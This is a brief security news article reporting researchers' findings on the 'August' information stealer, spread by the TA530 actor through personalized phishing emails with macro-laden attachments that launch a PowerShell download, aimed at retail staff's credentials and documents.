In keeping with the idea of PowerShell seeing greater use as an attack mechanism, a new information stealing piece of malware is using it to advance a malware assault, researchers said.
The malware — called August — is going out via TA530, an attack that focuses on highly personalized campaigns.
In this case, the August distribution campaign was targeting customer service and managerial staff at retailers in an attempt to steal credentials and sensitive documents from the compromised machines, said researchers at Proofpoint.
To ensure successful infection, the attacker used subject lines for the emails to reference to issues pertaining to purchases from the targeted company’s website. These emails ended up targeted at employees who could supposedly help resolve the problems, which made it likely they would open the attached documents, which said it contained detailed information about the issue.
However, as soon as the recipient opened the document, they would end up prompted to enable the macros, which in turn would launch a PowerShell command to download and install the August stealer on the machine. The malicious payload is downloaded from a remote site as a PowerShell byte array, along with a few lines of code to deobfuscate the array through an XOR operation.
The security researchers said in a blog post the macros used in this campaign are similar to those used in a campaign delivering the Ursnif banking Trojan.